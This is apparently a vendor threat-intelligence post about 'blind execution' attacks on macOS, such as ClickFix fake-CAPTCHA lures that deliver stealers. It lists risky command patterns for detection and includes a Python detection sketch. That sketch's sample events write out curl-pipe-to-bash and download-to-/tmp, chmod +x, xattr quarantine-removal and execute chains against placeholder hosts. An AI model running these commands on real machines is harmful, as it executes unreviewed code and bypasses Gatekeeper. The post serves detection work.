Legit tools + simple primitives are weaponized everywhere
Blind execution represents a critical evasion technique where victims unknowingly execute malicious code without any opportunity to review it. Attackers leverage this in multiple scenarios:
- Social engineering: "Just run this one command to fix your issue."
- Fake software installers mimicking legitimate tools (Docker or Homebrew)
- Post-exploitation C2 communications downloading additional tools
- Supply chain attacks delivering staged malware
This attack vector is devastatingly effective because:
- Users trust terminal commands - Especially when presented as "fixes" from seemingly legitimate sources
- Security tools can't inspect - Command execution happens in trusted contexts (Terminal.app, iTerm2)
- No file drops required - Fileless execution via curl pipe to shell leaves minimal forensic traces
- Bypasses Gatekeeper - Commands executed directly in Terminal bypass macOS code-signing checks
Observed Patterns:
We can't straight-up block curl or bash, but we can recognize risky compositions like:
- Script Editor, Terminal, iTerm2, Mono / .NET runtimes
- curl, wget, bash, zsh, chmod +x, xattr, /tmp paths
- LaunchAgents created by npm/node, from browser-originated files, or by unusual users
Detections (for Anvilogic customers):
- macOS - Suspicious Curl Download to Temp Directory
- Blind Script Execution via Command Substitution Fileless Attack
- Gatekeeper Bypass via curl to tmp followed by chmod +x Execution
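As an added illustration of the composition-based approach above (example code written for this page, not Anvilogic's detection logic), the sketch below correlates curl/wget, chmod +x, xattr and /tmp paths within one terminal session over a handful of constructed process events; the event format, session ids and rule names are assumptions:

```python
import shlex
from collections import defaultdict

# Constructed sample process-execution events (not from the original post):
# (timestamp, terminal session, command line). A session groups one user's shell.
EVENTS = [
    (1, "tty1", "curl -fsSL https://example.invalid/fix.sh | bash"),
    (2, "tty2", "/usr/bin/curl -o /tmp/.update https://example.invalid/update"),
    (3, "tty2", "chmod +x /tmp/.update"),
    (4, "tty2", "xattr -d com.apple.quarantine /tmp/.update"),
    (5, "tty2", "/tmp/.update"),
    (6, "tty3", "curl -I https://example.invalid/"),
    (7, "tty3", "ls -la /tmp"),
]

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"bash", "zsh", "sh"}
TMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/")

def detect(events):
    # Returns (timestamp, rule, session) findings for risky command compositions.
    findings = []
    tmp_written = defaultdict(set)  # session -> temp paths a downloader wrote to
    for ts, session, cmd in events:
        segs = [shlex.split(s) for s in cmd.split("|")]
        progs = [s[0].rsplit("/", 1)[-1] for s in segs if s]
        # Rule 1: downloader piped straight into a shell (fileless, nothing to review)
        if len(progs) > 1 and progs[0] in DOWNLOADERS and progs[-1] in SHELLS:
            findings.append((ts, "curl_pipe_shell", session))
        # Track downloads written into temp paths (curl -o PATH / wget -O PATH)
        for seg in segs:
            if seg and seg[0].rsplit("/", 1)[-1] in DOWNLOADERS:
                for flag, path in zip(seg, seg[1:]):
                    if flag in ("-o", "-O") and path.startswith(TMP_PREFIXES):
                        tmp_written[session].add(path)
                        findings.append((ts, "curl_to_tmp", session))
        if not segs[0]:
            continue
        args = segs[0]
        staged = [a for a in args[1:] if a in tmp_written[session]]
        # Rule 2: chmod +x on a file this session just downloaded to temp
        if progs[0] == "chmod" and "+x" in args and staged:
            findings.append((ts, "curl_tmp_chmod_x", session))
        # Rule 3: quarantine attribute stripped from a staged download
        if progs[0] == "xattr" and "com.apple.quarantine" in args and staged:
            findings.append((ts, "quarantine_removed", session))
        # Rule 4: the staged download itself is executed
        if args[0] in tmp_written[session]:
            findings.append((ts, "tmp_download_executed", session))
    return findings
```

Session-scoped correlation is what keeps plain `curl -I` or `ls /tmp` from firing while the full download, chmod, xattr, execute chain does.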
Real-World Usage:
- ClickFix Campaigns (2024-2025): 517% increase in H1 2025 (ESET), becoming #2 attack vector after phishing, accounting for 8% of all blocked attacks. Fake CAPTCHA/verification pages instruct users to paste malicious commands into Terminal (macOS) or PowerShell (Windows). Campaigns targeting:
  - Spectrum telecom impersonation delivering Atomic macOS Stealer (AMOS)
  - Google Meet fake conference pages
  - Fake Cloudflare CAPTCHA verifications
  - TradingView financial platform spoofs
  - Odyssey Stealer deployment via tradingviewen[.]com